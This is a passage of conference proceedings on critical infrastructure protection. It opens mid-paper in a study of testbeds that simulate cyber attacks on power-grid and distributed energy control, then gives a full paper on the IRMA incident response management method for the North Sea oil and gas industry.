commands. The objective of the TSO is to maintain the electric power system in a secure state. In order to prevent the escalation of a possible emergency situation, the TSO Energy Management System makes frequently a selection of detachable loads and emits arm requests to their corresponding control centres. The investigated threats are the same of the previous scenario, but the Communication Network is more complex because it interconnects two separate (TSO and DSO) teleoperation networks. Cyber attacks carried out under emergency conditions, when defence actions have to be performed out under strict real time constraints, can cause severe damages, e.g. inhibiting the proper execution of the required automatic load shedding actions may provoke the degeneration of the emergency in the transmission grid. The effects on the whole power system of the considered ICT attacks will depend on the number of components involved. As in the previous case the severity of ICT-Power cascading effects depends on the specific sequencing of attacks during the ongoing emergency procedure.
Testbeds for Assessing Critical Scenarios in Power Control Systems
3
227
Control Vulnerabilities for Distributed Energy Resources
The penetration of distributed generation in the electricity grid is increasing [5]. For optimal deployment of distributed energy resources (DER, such as generators and storage units), the underlying control applications are also distributed and require communication among the intelligent electrical devices (IED) [6]. Therefore, it is necessary to investigate the impact of different types of ICT anomalies on this communication network and on the control applications and hence to identify the vulnerabilities. Examples of such anomalies include physical (random) faults and intrusions (malicious faults). To this extent, a 16-node radial segment of a grid with several DER has been simulated together with its control algorithms (figure 2). The simulation has been set-up as set of communicating Java processes, running in a Linux environment on a workstation PC. Via configuration file, the electrical topology and parameters can be set. In each timestep, the resulting electrical equilibrium is calculated, as generator and load profiles are changing.
Fig. 2. Radial distribution segment with DER used in simulations
This simulated distribution grid segment has 3 branches with 15 nodes (each representing a generator and a load) and is connected via a transformer to the higher level electricity grid. Three control applications are integrated. A primary control algorithm controls active power output based on local voltage level only, i.e. it does not require communication. Frequency is kept stable by the connection to the external power grid via node 16. Secondary control (keeping the voltage and frequency within its limit) and tertiary control (optimising economically), however, are based on communication among the nodes. In the simulation, a decentralised approach has been chosen for this communication, in which IED of loads and generators of the radial distribution segment use an overlay network that is set up on top of the physical communication infrastructure [7,8]. Such overlay network allows to deal with random faults as well as with dynamic changes in the topology [9]. Secondary and tertiary control is based on a gossiping algorithm on top of the overlay network. It is assumed that communication
228
G. Dondossola et al.
delays and gossiping intervals are at least an order of magnitude larger than the time needed for settlement of the primary control loop. In the simulations, this means that power flow calculations and the primary control actions are calculated first until convergence is observed. Only then, IED associated to generators will gossip, and adjust their parameters for the primary control loop according to the results of secondary and tertiary control loop. When all generators finished gossiping, new power flow calculations are done until convergence, and so on. The number of iterations is chosen in advance. For tertiary control purposes, cost curves are associated to generators, which are chosen to be monotonically increasing linear functions with a marginal cost for zero output (which is not necessarily zero) and some marginal cost for the generator maximum output. The feed-in transformer has no bounds on the amount of power it can inject into the distribution net (which is realistic for the power levels in the presented DER scenarios). The transformer has a relatively high marginal cost curve which increases when injected power increases. This high price favours local generators to produce. In all scenarios presented a similar load profile is applied. Generators start from set point P0 (desired power output) and loads have a fixed consumption. Unbalances between local supply and demand are automatically dealt with by the transformer. At time instance (or iteration) 21 several loads increase consumption and at time instance 121 several loads decrease it. Hence, one will typically observe three phases during a simulation: – t = [1..20]: Steady settlement of initial settings to global optimum. – t = [21..120]: Demand increases; initially, feeder resolves unbalance and some distributed generators react as well (if local voltage drop is high enough). Afterwards, they adjust power output to evolve towards optimum. – t = [121..181]: Demand suddenly decreases; again, feeder and some distributed generators resolves the unbalance, after which all power outputs are adjusted towards new optimum. Simulation results are displayed using three graphs, showing information on all generators and the feeder transformer at every time step: active power output P, voltage levels V and marginal costs C of each generator. The simulations have been performed, first without ICT anomalies (reference results not shown here), and consequently, in different experiments, subject to several threats on the communication network among the IED. 3.1
Denial-of-Service Attacks on IP-Network
A denial-of-service (DoS) attack tries to disturb the functionality of service by flooding a service provider with fake or unfinished requests. Such DoS can be generic (caused by a worm attacking random computers/networks) or targeted (e.g. by constantly joining and leaving the overlay network, which triggers a bandwidth consuming algorithm searching new neighbours) and may lead to a denial of all communication over one or more channels. Whatever underlying reason or mechanism for the DoS attack, it results in long communication delays, which lead
Testbeds for Assessing Critical Scenarios in Power Control Systems
Power
229
Voltage
Fig. 3. Power output and voltage level when overlay network is partitioned Costs
Fig. 4. Marginal production costs when overlay network is partitioned
to loss of connection between IED, while they are participating in secondary and tertiary control schemes. As such, the system degenerates to distribution segment in which some generators are not taking part in control applications. Hence secondary and tertiary control algorithms will not converge to a global optimum, but rather seek an optimal solution among participating IEDs. 3.2
Attack on Overlay Network Topology
A different scenario is an attack on the topology of the overlay network by some malicious node(s). To set up and maintain the overlay network, such malicious nodes would send fake results to nodes searching for new neighbours as to make themselves the new neighbour of these nodes. After some time, these malicious
230
G. Dondossola et al.
nodes become a centre of the overlay network. The overlay network may partition into separate parts as a result of such malicious attack to the overlay network (or also as a result of a major communication infrastructure, which partitions the underlying physical network). In the simulation, the overlay network partitions in two groups: i) IED of generator 1 to generator 9, and ii) IED of generator 10 to generator 15 with the grid-connected transformer. Note that the system remains connected electrically. The influence of the splitting of the overlay network results in two groups of generators that are locally converging - but not globally (figure 3). For the cost curve (figure 4), this results in convergence to two different cost levels, while a single equal marginal cost for all generators is the global optimum. 3.3
Voltage Level Attack
As indicated above, the secondary control algorithm implemented among the IED optimizes voltage levels in all points of the distribution grid segment as to minimize the divergence from rated values. Since over-voltages can damage equipment attached to the power grid, attacks on the secondary control loop can induce over-voltages which can trigger the protection, leading to local black-outs, or physically damage grid assets. A malicious node could inject false values in the secondary control loop (which is based on a distributed averaging algorithm on top of the overlay network). Over time, these errors accumulate and the global average will diverge from its correct value, leading to incorrect IED set points. The simulation shows the result of a malicious IED incorrectly injecting large values into the distributed averaging algorithm of the secondary control loop. Such large value normally means that voltage levels are low in most parts of the distribution grid, and this encourages the other generators to increase active power production. Figure 5 shows that all local generators increase their production, and that the power output of the feeding transformer decreases below
Voltage
Power
Transformer (16)
Fig. 5. Power output and voltage levels when malicious node injects incorrect values, resulting in a voltage level attack
Testbeds for Assessing Critical Scenarios in Power Control Systems
231
zero, meaning that excess power flows back to the higher level grid. However, these increasing power injections also increase local voltage to dangerous levels, and thus the malicious node succeeded into a voltage level attack.
4
Resilience Assessment of Teleoperation Systems
The laboratory testbed for teleoperation systems realises a prototypal but significant power system management architecture with its integrated ICT infrastructure. Focus is being placed on the development of those aspects of the actual power control system which can be used for the implementation of a set of significant attack scenarios, in order to evaluate their plausibility, to demonstrate the possible evolution of the attack processes and to assess the severity of the potential damage on the attack’s targets. Besides the two scenarios described in section 2, the testbed architecture deploys other two interdependency scenarios described in [4] addressing security issues arisen in the integration of operation and maintenance data and in the centralised maintenance of ICT devices, including communication and control devices. The communication architecture is based on the following assumptions: – the two lower layers of the OSI stack (physical and datalink) are modelled by switched Ethernet, both for local and wide area communications; – TCP/IP and UDP/IP are used at the transport/network layers; – application layer data exchange does not make use of commercial protocols, but the contents of the Application Protocol Data Units (APDU)s are compliant with the appropriate standard (IEC 60870-6 Inter-Control Centre Communications Protocol-ICCP/TASE-2, IEC 60870-5-104 for centresubstation communications, IEC 61850 for communications within the substations).
Fig. 6. Grid teleoperation testbed
232
G. Dondossola et al.
Figure 6 gives the layout of the testbed platform implementing the TSO and DSO teleoperation of two high-medium voltage substations.
5
Testbed for Vulnerability Assessment of DER Control
A high penetration of DER has a considerable impact on the electrical and control aspects of the grid [10,11], as well as it provides many opportunities for distributed control [12,13,14]. In order to test cyber problem scenarios [15,16] in DER control applications presented in section 3 - based on simulation - on a real setup, a laboratory testbed has been built, consisting of IED - implementing the control and communication - controlling power electronic converters - which are connected electrically in a microgrid. These converters emulate distributed energy resources, such as a small-scale electricity generator (photovoltaic systems, wind turbines), a load (possibly voltage/frequency dependent), energy storage devices (e.g. a battery, fuel cell). The IED are responsible for the primary control of the converter, but also for secondary and tertiary control algorithms on top of the communication network. The platform, consisting of converters and IED, allows control applications to be modelled in a high level programming tool (Matlab/Simulink), after which they are downloaded onto the hardware for execution on the created microgrid [17] This Matlab/Simulink interface also provides a real-time interface on the IED to the physical electronic hardware, in order to monitor and control it. The IED are based on industrial Linux-based PC, extended with the realtime framework Xenomai [18]. These Matlab/Simulink tools on the different IED associated to different converters are interconnected by standard communication technology (Ethernet and TCP/IP). This set-up allows analysing effects of different types of faults in the communication network on the electrical control applications (secondary and tertiary control, data aggregation, power quality monitoring and mitigation, demand side management, etc.). As such, this testbed evaluates dependencies of the electric power system from the information infrastructure, and identifies the robustness of the control algorithms to disturbances (figure 7).
communication network
electricity grid
IED+DER
Fig. 7. DER testbed: converter platform (left) and setup of DER interconnected electrically (thick lines) with corresponding IED interconnected via communication (dashed)
Testbeds for Assessing Critical Scenarios in Power Control Systems
6
233
Conclusions
The paper presents intermediate results of the activities undertaken within the European Project CRUTIAL related to the development of testbeds for assessing the impact of ICT threats on power control systems. The K.U.Leuven microgrid testbed is set up to evaluate behaviour of ICTdriven decentralised control algorithms in microgrids with a large penetration of DER. By interconnecting IED over ICT infrastructure - beside interconnecting DER electrically, it is possible to evaluate opportunities and vulnerabilities of such coupled infrastructure. In future work, this ICT infrastructure will integrate CRUTIAL middleware modules to make more robust to different types of faults. The testbed will be used to assess and analyse their effect on the microgrid control behaviour. The CESI RICERCA testbed addresses both concrete needs and envisaged evolutions of power grid control systems. The testbed scenarios evaluate at which extent complex control infrastructures implementing multiple operators’ defence actions can be protected by resilient ICT architectures. The scenarios cover emerging themes like information and communication security aspects of power substation control, support to emergency management by the distribution grid control, interactions between process control and corporate activities and remote maintenance of ICT automation devices. The testbed architecture reflects the WAN of LANs communication topology of the CRUTIAL reference architecture, including VPNs and firewall filtering techniques. The Human Machine Interface applications supporting the scenario evolution within the CRUTIAL testbed enrich the typical supervision and control functionality currently available in the control rooms with several ICT-related information that may increase the situation awareness of the operators and their capability to promptly recovery from ICT-enabled power failures. In this respect the testbed activity allows to improve the human aspects involved in the whole power system resilience. Acknowledgements. This work has been partially financed by the European Commission with the IST Project 27513 CRUTIAL http://crutial.cesiricerca.it.
References 1. Abele-Wigert, I., Dunn, M.: An Inventory of 20 National and 6 International Critical Information Infrastructure Protection Policies. In: International CIIP Handbook 2006, vol. I. Center for Security Studies, ETH Zurich (2006) 2. Garrone, F., Brasca, C., Cerotti, D., Raiteri, D., Daidone, A., Deconinck, G., Donatelli, S., Dondossola, G., Grandoni, F., Kaˆ aniche, M., Rigole, T.: Analysis of new control applications. CRUTIAL Workpackage 1 Deliverable D2. CRUTIAL consortium (2007) 3. Rinaldi, S., Peerenboom, J., Kelly, T.: Identifying, understanding, and analyzing critical infrastructureinterdependencies. IEEE Control Systems Magazine 21(6), 11–25 (2001) 4. Deconinck, G., Beitollahi, H., Dondossola, G., Garrone, F., Rigole, T.: Testbed deployment of representative control algorithms. Technical report CRUTIAL Workpackage 3 Deliverable D9. CRUTIAL consortium (2008)
234
G. Dondossola et al.
5. Kueck, J., Kirby, B.: The distribution grid of the future. The Electricity Journal (Elsevier Science), 78–87 (June 2003) 6. Deconinck, G.: An evaluation of two-way communication means for advanced metering in Flanders (Belgium). In: Proceedings of the IEEE Int. Conf. on Instrumentation and Measurement Technology (I2MTC 2008), Victoria, Vancouver Island, Canada, pp. 900–905 (2008) 7. Vanthournout, K., De Brabandere, K., Haesen, E., Van Den Keybus, J., Deconinck, G., Belmans, R.: Agora: Distributed tertiary control of distributed resources. In: Proceedings of the 15th Power Systems Computation Conf. (PSCC 2005), Liege, Belgium (2005) 8. Vanthournout, K., Deconinck, G., Belmans, R.: A middleware control layer for distributed generation systems. In: Proceedings of the IEEE Power Systems Conference and Exhibition (PSCE 2004), New York City, USA (2004) 9. Deconinck, G., Rigole, T., Beitollahi, H., Duan, R., Nauwelaers, B., Van Lil, E., Driesen, J., Belmans, R., Dondossola, G.: Robust overlay networks for microgrid control systems. In: Proceedings of the Workshop on Architecting Dependable Systems (WADS 2007), co-located with 37th Ann. IEEE/IFIP Int. Conf. on Dependable Systems and Networks (DSN 2007), Edinburgh, Scotland, UK, pp. 148–153 (2007) 10. Vu Van, T., Driesen, J., Belmans, R.: Power quality and voltage stability of distribution system with distributed energy resources. Int. Journal of Distributed Energy Resources 1, 227–240 (2005) 11. Hadjsaid, N., Canard, J., Dumas, F.: Dispersed generation impact on distribution networks. IEEE Computer Applications in Power 12(2), 22–28 (1999) 12. Dimeas, A., Hatziagyriou, N.: Operation of a multi-agent system for microgrid control. IEEE Transactions on Power Systems 20(3), 1447–1455 (2005) 13. McArthur, S., Davidson, E., Catterson, V.: Building multi-agent systems for power engineering applications. In: IEEE Power Engineering Society General Meeting 2006 (2006) 14. Rigole, T., Vanthournout, K., De Brabandere, K., Deconinck, G.: Agents controlling the electric power infrastructure. Int. Journal of Critical Infrastructures (IJCIS) 4(1/2), 96–109 (2008) 15. Dondossola, G., Lamquet, O.: Cyber risk assessment in the electric power industry. Cigr´e Electra Magazine 224 (2006) 16. Dondossola, G., Szanto, J., Masera, M., Fovino, I.: Effects of intentional threats to power substation control systems. Int. Journal of Critical Infrastructures (IJCIS) 4, 129–143 (2008) 17. Van Den Keybus, J., Bolsens, B., De Brabandere, K., Driesen, J.: Using a fully digital rapid prototype platform in grid-coupled power electronics applications. In: Proceedings of the 9th IEEE Conf. on Computers and Power Electronics (COMPEL 2004), Urbana-Champaign, USA (2004) 18. Xenomai: Real-Time Framework for Linux (2008), http://www.xenomai.org
A Structured Approach to Incident Response Management in the Oil and Gas Industry Maria B. Line, Eirik Albrechtsen, Martin Gilje Jaatun, Inger Anne Tøndel, Stig Ole Johnsen, Odd Helge Longva, and Irene Wærø SINTEF, N-7465 Trondheim, Norway {maria.b.line,eirik.albrechtsen,martin.g.jaatun, inger.a.tondel,stig.o.johnsen,odd.h.longva,irene.waro}@sintef.no
Abstract. Incident Response is the process of responding to and handling ICT security related incidents involving infrastructure and data. This has traditionally been a reactive approach, focusing mainly on technical issues. In this paper we present the Incident Response Management (IRMA) method, which combines traditional incident response with proactive learning and socio-technical perspectives. The IRMA method is targeted at integrated operations within the oil and gas industry.
1
Introduction
Offshore oil and gas installations are increasingly remotely operated and controlled [3], and this has also lead to a situation where the technologies used are changing from proprietary stand-alone systems to standardised PC-based systems integrated in networks. The reliance on Commercial Off-The-Shelf (COTS) operating systems such as Microsoft Windows exposes the operators to more known information security vulnerabilities, and hence increased probability of incidents. Increased networking between the Supervisory Control and Data Acquisition (SCADA) systems and the general ICT infrastructure (including the Internet) also increases the overall vulnerability. In North Sea operations, it has traditionally been assumed that SCADA systems were sheltered from the threats emerging from public networks [18]. Integration of ICT and SCADA systems makes this assumption void. There has been an increase in incidents related to SCADA systems [1], but these types of incidents and attacks are seldom reported and shared systematically [25] (pp 13-18). The operating organisation is also changing; integrated operations enable better utilization of expertise independent of geographical location, leading to more outsourcing and interaction between different professionals [3]. A great number of incidents are relatively harmless, mainly causing disturbances, frustration, and reduced work efficiency. More harmful incidents may disable technical equipment, such as sensors, computers or network connections, which interrupts production continuity. Severe incidents may lead to a chain R. Setola and S. Geretshuber (Eds.): CRITIS 2008, LNCS 5508, pp. 235–246, 2009. c Springer-Verlag Berlin Heidelberg 2009
236
M.B. Line et al.
of consequences, where the end result may be large economical losses, environmental damages, and loss of lives. Effective incident handling can minimize consequences, and thereby ensure business continuity. This paper presents a structured approach to incident management, taking into account technological as well as human and organisational factors. The remainder of this paper is structured as follows: Section 2 gives a brief presentation of the empirical background and motivation for developing the Incident Response Management (IRMA) method. Section 3 presents the three phases of IRMA in brief, with more details presented in Sections 4-6. Section 7 discusses the IRMA method and how to implement the method in industry. Section 8 concludes the paper.
2
Empirical Background and Motivation
The development of the IRMA framework for the oil and gas industry is based on a combination of empirical sources. The conclusion from this empirical work [15] is that the oil and gas industry still does not consider that information security is something that they need to be concerned with. One consequence of this is that there currently are no systematic security incident handling schemes implemented in this industry. Incidents that are detected are treated in an adhoc manner, and there are reports of e.g. virus infections that are left untreated for weeks [18]. Our research confirms that there exists a deep sense of mistrust between the process control engineers (who are in charge of SCADA systems) and ICT network administrators (who are in charge of office networks). The chasm between the two groups can be illustrated by a quote from an industry representative during a vulnerability assessment: “We don’t have any ICT systems – we only have programmable logic.” This implies that simply implementing an established incident handling scheme would not work, since it would be perceived as something emanating from the “ICT people” – a successful incident response management scheme needs to demonstrate that it is based on the realities faced by the process control engineers. (see Jaatun et al. [16] for details).
3
The Phases of IRMA
The IRMA method combines incident response as described in e.g. ISO/IEC TR 18044 [2] and NIST 800-61 [12] with increased emphasis on pro-active preparation and reactive learning. Our aim is to ensure that incident response procedures are continually improved, and that lessons learned are disseminated to the appropriate parts of the organisation. We focus mainly on organisational and human factors, and less on technical solutions. Fig. 1 illustrates the phases of the IRMA method: – Prepare: Planning for and preparation of incident response – Detect and recover: Detect incidents and restore to normal operation – Learn: Learning from incidents and how they are handled.
A Structured Approach to Incident Response Management
237
Fig. 1. The IRMA wheel
An organisation is likely to spend most of its time in the Prepare phase. The Detect and recover phase and the subsequent Learn phase are triggered by an incident (the bomb in Fig 1). Effective detection, recovery, and learning from incidents are however based on preparations and proactive learning of the Prepare phase. Incident response does not operate isolated in an organisation; it has to adjust to external dynamics, both within and outside the organisation. The Learn phase focuses on learning from single incidents. This learning is important as it makes it possible to use the experiences from incident handling to improve the incident management work in all phases. In the following, the three suggested phases of incident response management are presented in more detail.
4
Prepare
The Prepare phase is where the organisation prepares to detect, handle and recover from security incidents and attacks. Other proactive tasks such as awareness raising are also considered part of the Prepare phase (see below). 4.1
Risk Assessment
A risk assessment entails identifying the most important unwanted incidents to your assets, and determining the probability and consequence of each incident. Risks are often documented in a risk matrix, as shown in e.g. [18]. If you do not know which assets should be protected, and from what, it is impossible to prioritize and design the appropriate security measures; this makes a periodic risk assessment one of the most important activities related to information security.
238
4.2
M.B. Line et al.
Plans and Documentation
In an emergency situation, tacit knowledge may be your enemy – if the person with the knowledge is absent. This is why all routines, configurations, and systems must be documented in sufficient detail during the Prepare phase – and also kept continually updated as part of the “prepare cycle”. 4.3
Roles and Responsibilities
The main responsibilities regarding incident response are the following: – Planning, preparation and training: ICT security management. – Detect and alert: Anyone who detects or suspects that an incident has occured must raise an alert. – Receive alerts: Someone (either a person or function) must be appointed to receive alerts. Everyone must know who to alert in any given situation. – Provide technical expertise: Someone, either inside or outside the organisation, must have technical system and/or security knowledge, and this knowledge must be available for incident recovery. – Handle incident and recovery: Someone must be responsible for leading the incident response work. – Authority to make decisions: Management must be on hand to make hard decisions. – Follow-up activities, including learn: ICT security management. The responsibilities of suppliers in case of incidents involving their systems should be explicitly included in contracts. 4.4
Awareness Creation and Training
The motivation for improving security awareness is twofold: Preventing incidents from happening and improving the ability to detect and react to incidents. A general problem is that the reason for abnormal behaviour of systems is not understood, and hence many incidents are not detected, reported, and handled. Thus, one of the biggest challenges related to information security incidents is that they are not detected by the users of the affected systems. Regular training exercises may have a double effect here: In addition to building and maintaining practical incident handling skills, the exercises remind users that abnormal system behaviour may be the symptoms of an incident. Building security culture in the setting of integrated operations comes with some special challenges; shift work, multiple organisations, and several specialist communities involved (land and platform, ICT and process systems). Management involvement will increase the impact of any awareness campaigns or initiatives. 4.5
Monitoring
In systematic control of management systems, feedback mechanisms have been utilized in many different business processes [13], e.g. financial results; production efficiency; market reputation; quality management; and Health, Safety, Security and Environment (HSSE) management. The field of safety management
A Structured Approach to Incident Response Management
239
has a tradition for using performance indicators for persistent feedback control [20]. We suggest to implement similar indicators to measure how the incident response performs over time, e.g. time spent on each incident, and the total number of incidents in a given period. 4.6
External Dynamics
Incident response management does not operate in isolation from other parts of the organisation and the organisational context. It is also influenced by the general information security management strategy. This influence goes both ways, as the two must be adjusted to learning made in the other area. Both are influenced by information security regulations.
5
Detect and Recover
The Detect and recover phase includes detection, alerting, recovering and documenting of an incident. The recommendations made regarding detecting and recovering from incidents are based on various sources [2,12,9]. 5.1
Alerting
Information security incidents are mainly detected in two ways [2]; by coincidence, where someone notices something unusual, or by routine use of technical security measures. The former is just as important as the latter, which means that each and every employee must be aware of their responsibility of alerting when they discover irregularities. Roles and responsibilities are already defined, so everyone knows who to alert and who is responsible for handling the incident. Regarding incident reporting there may be a lot to learn from experiences within HSSE [17]. 5.2
Assessment
The incident must be assessed with respect to severity and the way forward. The following actions take place [2]: – Acknowledge receipt: The alerter is informed that handling has started. – Collect more information: If necessary, more information will be collected [12]. The goal is to state severity and scope of incident, who should be involved in handling it, and whether it may affect production and/or safety. – Further alerting:Additional personnel needed for handling must be alerted. The ideal incident management team in integrated operations includes experts on both ICT security and process control systems, which will lead to the best possible trade-offs between security and production. Suppliers may need to be involved.
240
5.3
M.B. Line et al.
Immediate Response
In a process control environment it is an imperative goal to keep the systems running as long as possible. Disconnecting them from external networks completely is however a reasonable first action. Activating surveillance techniques may be prudent in any case, to achieve a greater understanding of the incident. The best decisions at the time of an incident are made if one is prepared for what major types of incidents may occur and what actions should be taken in response to these incident types [25]. By escalation we mean to get help from outside the team. There may be several reasons for an escalation: The necessary competence is not available in the current team; one is not able to get the incident under control; the incident is more serious than first anticipated; or upper management decisions are necessary. Each incident must be documented with respect to what happened, which systems were affected, which damages occurred and how the incident was handled. Documentation of an incident starts when the alert is raised, and continues throughout all steps in the incident handling. Documentation must be made easy – otherwise, it will not be performed. Any tools should be readily available and easy to use, and those involved should be trained in using them. Alternatively, one could just describe actions taken in an unstructured document or in a logbook [12]. The incident and the analysis of it must be documented in order to inform other actors about the incident and share good practice, as well as to keep a record of the incident that can be used to sustain learning from the incident, or analyse the incident at a later stage. 5.4
Communication Plan
It may be necessary to inform selected persons within or outside the organisation about the incident, such as: Management at different levels – they may need to comment the incident in public, and they should not need to hear about the incident through other channels (e.g. the media); those affected by the incident need to understand what happened, and why; media – if the incident is of public interest. 5.5
Recovering
The immediate responses seldom solve the entire problem; they rather ensure that the incident is under control and limit the damage. Thereafter, actions must be taken to bring the affected system(s) back to normal operation; i.e. ensuring that they are in a safe state, and reconnecting to external networks. Configuration changes and patching will help reducing the vulnerability of the system attacked [2]. This should also be done to other systems that may be targeted for similar attacks in the near future. The incident may have lead to malicious code installed in the system that is hard to detect. To clean up, installation media for operating systems may be an alternative, and/or backup copies and other recovery tools. Integrity checks and investigation tools may also be helpful [9].
A Structured Approach to Incident Response Management
5.6
241
The End of Recovery Is the Beginning of Learn...
When everything is up and running, the experiences should be explored to improve the preparedness of the organisation. This is the focus of the Learn phase that is presented in the following section. The Learn phase should be started when the incident is still fresh in people’s minds. But first: The person who raised an alert about the incident must be briefed on how the incident was handled. This is an important part of awareness-raising in incident management.
6
Learn
The learning phase of IRMA focuses on learning from the actual incident [8] by four different steps in addition to a parallel activity of learning from the handling of the incident. 6.1
Commitment and Resources
In order to succeed with learning, the organisation must be prepared for it. The key issue is the extent of management commitment and the willingness to spend resources on learning from incidents. Learning processes are dependent on documentation of the incident, as stressed in the Detect and recover phase. A structured accident analysis methodology will help identify immediate and underlying causes, and should cover organisational, technical, and human factors issues. 6.2
What Occurred - Identify Sequences of Events Using STEP
The STEP method [14] is a tool for detailed analysis of incidents and accidents. It allows for a graphic presentation of the events during the scenario, in the following manner: – Actors (i.e. person or object that affects the incident) are identified. – Events that influenced the incident and how it was handled are identified and placed in the diagram according to the order in which they occurred. – The relationship between the events, i.e. what caused each of them, is identified and showed in the diagram by drawing arrows to illustrate causal links. 6.3
Why - Identify Root Causes and Barriers
The STEP diagram can be used to fully understand the root causes and consequences of weak points and security problems. This is done by identifying weak points in the incident description, and representing them by triangles in the STEP diagram. A figure illustrating a STEP diagram can be found in [16]. The weak points should subsequently be assessed by a barrier analysis, including suggestion of countermeasures. (see e.g. [19]). Barriers are here understood to be technical, human, and organisational.
242
6.4
M.B. Line et al.
Recommend Security Improvements
The accident analysis, identified weak points, and suggested barriers, represent the necessary background to identify security recommendations. It is important to prioritise the suggested actions based on a cost/benefit analysis, and explicitly assign responsibility for performing the actions. 6.5
Evaluate the Incident Handling Process
The Learn phase also includes an evaluation of the incident handling process itself. Experiences from the handling process should be used to improve the managing of future incidents. Ideally, all relevant parties should be involved shortly after an incident occurred and was handled, while information is still fresh in people’s minds. Factors to consider include [2]: – – – –
Did the incident management plan work as intended? Were all relevant actors involved at the right time? Are there procedures that would have aided detection of the incident? Were any procedures or tools identified that would have been of assistance in the recovery process? – Was the communication of the incident to all relevant parties effective throughout the detection and recovery process?
7
Discussion
This paper has described a framework for incident response management in the North Sea oil and gas industry. There are several other publications describing similar approaches to incident handling, e.g. [2,12,5,4,22,11]. Our approach follows the same basic ideas presented in the literature above, but differs from these in three ways: 1) its emphasis on socio-technological aspects covering the interplay between individuals, technology, and organisation; 2) its emphasis on learning in a reactive and pro-active way; and 3) its range of use for ICT/SCADA systems in the oil and gas industry. The former two of these contributions are discussed in this section. First, we discuss why a socio-technical approach is necessary for incident handling in integrated operations in the petroleum industry. Then we discuss why learning from incidents is important, but also challenging. 7.1
Socio-technical Approach to Incident Handling
A socio-technical information security system [6] is created by elements of different information security processes and the interplay between these elements. Traditional incident handling [2,4,12] has mainly focused on technical aspects of incident response. The described framework in this paper has also focused on individual behaviour and organisational processes. This is for example shown by the emphasis on organisational roles, awareness training, risk assessment processes, and follow-up activities in the Prepare phase; roles in the Detect and
A Structured Approach to Incident Response Management
243
recover phase; and involvement of actors in learning activities. In general, the information security domain has lacked focus on socio-technical approaches [10,23]. Our approach to incident response thus contributes to a wider perspective on information security management as it considers information security as a sociotechnical system. The described Prepare phase in Section 4 shows how technological solutions, individuals, and organisational structures and processes are primed to be ready to discover and deal with incidents as well as prevent incidents from happening. These assets are important in the development and maintenance of a sociotechnical incident handling system, but also to make the system proactive. The learning processes suggested in this paper emphasise organisational learning, i.e. changes in organisational interplay between individuals and groups including modifications of organisational processes and structures [7]. This approach implies that incident learning should emphasise both single-loop and double-loop learning [7], i.e. response based on the difference between expected and obtained outcome (single-loop) and to be able to question and change governing variables related to technology, organisation, and human factors that lead to the outcome (double-loop). The latter is necessary for socio-technical long-term effects, while the former is more concerned with fire-fighting and technological solutions. Although empirical findings show that there are few incidents in the oil and gas industry, the same findings indicate that systematic analyses of incidents and organisational learning are seldom performed in practice [16]. The root causes of incidents are not always documented and there is a main focus on technical issues when studying incidents. Organisational and human factors issues are seldom explored. Different professional disciplines are a challenge for the learning capability in an organisation, as different roles and positions should be involved in incident learning processes. In our interaction with the oil and gas industry we have experienced the communication gap between the groups of ICT staff and process control staff. These groups have traditionally not needed to cooperate, and have had different interests. The increased use and interconnectivity of ICT systems has resulted in increased information security threats also towards process control systems. For efficient handling of security incidents in SCADA systems these two groups need to cooperate. The communication gap between these two groups has been taken into account in the IRMA method. Challenges regarding different risk perceptions and situational understandings are best approached by discoursebased strategies [21,24], where involved actors meet and discuss challenges with each other aiming at a common understanding. 7.2
Learning from Incidents
Incidents are unwanted occurrences. At the same time they represent invitations to learn about risk and vulnerabilities in the socio-technical systems that are supposed to control these weaknesses. By using experience from incidents and the incident handling processes in a proper manner, the organisation will be
244
M.B. Line et al.
able to improve its overall security performance. Learning from incidents should thus be a planned part of incident handling, and the necessary resources for this activity must be allocated. The incident response management framework proposed in this paper describes such a learning approach, both in a reactive and pro-active manner. Reactive in the sense that one learns from actual incidents and incident handling, and pro-active in the sense that the incident handling system is adjusted to lessons learned both internally and in the organisations context. Based on the premises of incident response management as a sociotechnical system, the learning processes have emphasized organisational learning. In general, there are two obstacles to organisational learning: embarrassing and threatening issues [7]. Information security incidents may be embarrassing (e.g. virus infections due to incautious use of the Internet) and threatening in the sense that the incidents are considered confidential. These characteristics create individual and organisational behaviour that is counter-productive when it comes to learning from unwanted incidents. These defensive routines may in fact be the reason that our empirical research indicated so few incidents in the industry. However, the empirical study of incident handling in the oil and gas industry showed that several informants called for more frankness and openness about unwanted incidents to learn both internally in an organisation as well as cross-organisational, which requires more communication on incidents in and across organisations.
8
Conclusion
A systematic approach to incident response and learning from incidents is important to the oil and gas industry because of the recent development regarding integrated operations. Even though they experience few incidents at the moment, more technological and organisational changes are still to come, and not being prepared for greater risk and new and unforeseen threats may be very costly to a business that depends on approximately zero downtime in their production systems. The IRMA method is first and foremost developed with respect to the oil and gas industry, but it should also be applicable to other industries that rely on process control systems and integrated/remote operations. Our method is innovative for incident handling regarding pro-activity and organisational focus. Oil and gas production requires cooperation between many organisations, including operators, various suppliers, and regulatory authorities. This must be taken into account when implementing IRMA. It is not enough for an operator to consider only the operator organisation, since cooperation of suppliers is highly important when preparing for, detecting, recovering and learning from incidents. We therefore recommend that IRMA is implemented for installations rather than organisations. Since implementation of the IRMA method will require resources, and ideally preparation before the incident is a fact, success of IRMA requires that management is convinced of the benefits of incident management and willing to spend time and resources on preparation.
A Structured Approach to Incident Response Management
245
Acknowledgements This work was carried out in the IRMA project, 2005-2007, financed by the Norwegian Research Council and the Norwegian Oil Industry Association.
